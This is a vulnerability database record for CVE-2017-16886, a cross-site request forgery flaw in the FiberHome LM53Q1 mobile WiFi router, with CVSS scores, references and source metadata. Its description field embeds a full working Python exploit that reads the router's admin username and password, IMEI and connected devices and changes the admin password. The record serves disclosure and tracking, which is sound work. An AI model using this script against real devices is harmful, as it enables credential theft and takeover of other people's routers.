ID

VAR-201801-0581


CVE

CVE-2017-16886


TITLE

FiberHome mobile WIFI Device model LM53Q1 Vulnerable to cross-site request forgery

Trust: 0.8

sources: JVNDB: JVNDB-2017-012102

DESCRIPTION

The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP based web services in order to interact with the portal. Unauthorized Access to Web Services via CSRF can result in an unauthorized change of username or password of the administrator of the portal. FiberHome mobile WIFI Device model LM53Q1 Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FiberHomeMobileWIFIDeviceLM53Q1 is a portable router device from China FiberHome. A vulnerability exists in the portal in the FiberHomeMobileWIFIDeviceLM53Q1VH519R05C01S38 release. #!/usr/bin/python # /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$ # | $$_____/|__/| $$ | $$ | $$ | $$__ $$ | $$ | $$_____/ | $$ |__/ | $$ # | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$ # | $$$$$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$$$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$$$$$$/ /$$__ $$| $$_ $$_ $$ /$$__ $$|_ $$_/ /$$__ $$ | $$$$$ | $$ /$$/ /$$__ $$| $$ /$$__ $$| $$|_ $$_/ # | $$__/ | $$| $$ \ $$| $$$$$$$$| $$ \__/| $$__ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$__ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$__/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$ # | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$_____/ | $$ \ $$| $$_____/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$ # | $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/ # |__/ |__/|_______/ \_______/|__/ |__/ |__/ \______/ |__/ |__/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ |__/ \______/ \___/ \_______/ |________/|__/ \__/| $$____/ |__/ \______/ |__/ \___/ # | $$ # | $$ # |__/ # Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities # Exploit Author: Ibad Shah # Vendor Homepage: www.fiberhome.com # Version: VH519R05C01S38 # Tested on: Linux # Platform : Hardware # CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887 # Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC import requests,sys,getopt,socket,struct #Declaring IP as our global variable to probe for Gateway IP of Device global ip #Getting Gateway IP Address def get_default_gateway_linux(): with open("/proc/net/route") as fh: for line in fh: fields = line.strip().split() if fields[1] != '00000000' or not int(fields[3], 16) & 2: continue return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16))) return; ip = get_default_gateway_linux() exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================"; #Function to get Device Statistics def get_device_details(): gateway = None hardware = None device_name = None devices_all = '' version = None gateway = None ssid = '' dns1 = None dns2 = None requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1") api_response = requestStatus.content.replace('\t','').split('\n') for results in api_response: if "<hardware_version>" in results: hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','') if "<device_name>" in results: device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','') if "<version_num>" in results: version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','') if "<gateway>" in results: gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','') if "<ssid>" in results: ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','') if "<dns1>" in results: dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','') if "<dns2>" in results: dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','') if "<IMEI>" in results: imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','') print "\n==============================================" print "\nHardware Version of Device : "+hardware+"\n" print "\nName of Device : "+device_name+"\n" print "\nSoftware Version of Device : "+version+"\n" print "\nIMEI of Device! : "+imei+"\n" print "\nWiFi SSID of Device : "+ssid+"\n" print "\nGateway of Zong Device : "+gateway+"\n" print "\nDNS Primary of Device : "+dns1+"\n" print "\nDNS Secondary of Device : "+dns2+"\n" print "\n=============================================================================\n"; if "<known_devices_list>" in results: devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','') print "\nConnected Devices to WIFI\n" print devices_all #Function for getting User Account Details to login to Portal def get_user_account_details(): request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin") admin_details = request.content.replace('\t','').split('\n') for admin_login_response in admin_details: if "<router_username>" in admin_login_response: username = admin_login_response.replace('<router_username>','').replace('</router_username>','') if "<router_password>" in admin_login_response: password = admin_login_response.replace('<router_password>','').replace('</router_password>','') print "\nUsername of Device Web Application :\n"+username+" " print "Password of Device Web Application :\n"+password+"\n" print "\n=============================================================================\n"; #Function to change Administrator Password def change_admin_password(): set_password = raw_input("\nEnter Password to Change : ") password = str(set_password) xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>" headers = {'Content-Type': 'application/xml'} change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text print "Password Changed!" def main(): print exploit_title print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device" get_option = raw_input("\n Enter Option : "); option = int(get_option) if get_option == "1": get_user_account_details() raw_input("\n Press Any Key To Exit"); elif get_option == "2": get_device_details() raw_input("\n Press Any Key To Exit"); elif get_option == "3": change_admin_password() elif get_option == "": print "Good Bye!"; else: print "Goodbye!"; main()

Trust: 2.34

sources: NVD: CVE-2017-16886 // JVNDB: JVNDB-2017-012102 // CNVD: CNVD-2018-04087 // VULHUB: VHN-107853 // PACKETSTORM: 145737

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-04087

AFFECTED PRODUCTS

vendor:fiberhomemodel:lm53q1scope:eqversion:vh519r05c01s38

Trust: 1.6

vendor:fiberhome groupmodel:lm53q1scope:eqversion:vh519r05c01s38

Trust: 0.8

vendor:fiberhomemodel:mobile wifi device lm53q1 vh519r05c01s38scope: - version: -

Trust: 0.6

sources: CNVD: CNVD-2018-04087 // JVNDB: JVNDB-2017-012102 // CNNVD: CNNVD-201711-805 // NVD: CVE-2017-16886

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-16886
value: HIGH

Trust: 1.0

NVD: CVE-2017-16886
value: HIGH

Trust: 0.8

CNVD: CNVD-2018-04087
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201711-805
value: MEDIUM

Trust: 0.6

VULHUB: VHN-107853
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2017-16886
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2018-04087
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-107853
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2017-16886
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-04087 // VULHUB: VHN-107853 // JVNDB: JVNDB-2017-012102 // CNNVD: CNNVD-201711-805 // NVD: CVE-2017-16886

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.9

sources: VULHUB: VHN-107853 // JVNDB: JVNDB-2017-012102 // NVD: CVE-2017-16886

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201711-805

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201711-805

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-012102

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-107853

PATCH

title:Top Pageurl:http://hk.fiberhomegroup.com/en/index.html

Trust: 0.8

sources: JVNDB: JVNDB-2017-012102

EXTERNAL IDS

db:NVDid:CVE-2017-16886

Trust: 3.2

db:EXPLOIT-DBid:43460

Trust: 2.3

db:JVNDBid:JVNDB-2017-012102

Trust: 0.8

db:CNNVDid:CNNVD-201711-805

Trust: 0.7

db:EXPLOITDBid:43460

Trust: 0.6

db:CNVDid:CNVD-2018-04087

Trust: 0.6

db:VULHUBid:VHN-107853

Trust: 0.1

db:PACKETSTORMid:145737

Trust: 0.1

sources: CNVD: CNVD-2018-04087 // VULHUB: VHN-107853 // JVNDB: JVNDB-2017-012102 // PACKETSTORM: 145737 // CNNVD: CNNVD-201711-805 // NVD: CVE-2017-16886

REFERENCES

url:http://seclists.org/fulldisclosure/2018/jan/28

Trust: 3.1

url:https://www.exploit-db.com/exploits/43460/

Trust: 2.3

url:https://nvd.nist.gov/vuln/detail/cve-2017-16886

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16886

Trust: 0.8

url:https://nvd.nist.gov/vuln/detail/cve-2017-16887

Trust: 0.1

url:https://www.fiberhome.com

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-16885

Trust: 0.1

url:http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin",

Trust: 0.1

url:http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")

Trust: 0.1

url:http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin")

Trust: 0.1

sources: CNVD: CNVD-2018-04087 // VULHUB: VHN-107853 // JVNDB: JVNDB-2017-012102 // PACKETSTORM: 145737 // CNNVD: CNNVD-201711-805 // NVD: CVE-2017-16886

CREDITS

Ibad Shah

Trust: 0.1

sources: PACKETSTORM: 145737

SOURCES

db:CNVDid:CNVD-2018-04087
db:VULHUBid:VHN-107853
db:JVNDBid:JVNDB-2017-012102
db:PACKETSTORMid:145737
db:CNNVDid:CNNVD-201711-805
db:NVDid:CVE-2017-16886

LAST UPDATE DATE

2024-11-23T19:38:45.056000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2018-04087date:2018-03-02T00:00:00
db:VULHUBid:VHN-107853date:2018-02-02T00:00:00
db:JVNDBid:JVNDB-2017-012102date:2018-02-21T00:00:00
db:CNNVDid:CNNVD-201711-805date:2018-01-18T00:00:00
db:NVDid:CVE-2017-16886date:2024-11-21T03:17:10.810

SOURCES RELEASE DATE

db:CNVDid:CNVD-2018-04087date:2018-03-02T00:00:00
db:VULHUBid:VHN-107853date:2018-01-12T00:00:00
db:JVNDBid:JVNDB-2017-012102date:2018-02-21T00:00:00
db:PACKETSTORMid:145737date:2018-01-07T14:44:44
db:CNNVDid:CNNVD-201711-805date:2017-11-20T00:00:00
db:NVDid:CVE-2017-16886date:2018-01-12T17:29:00.943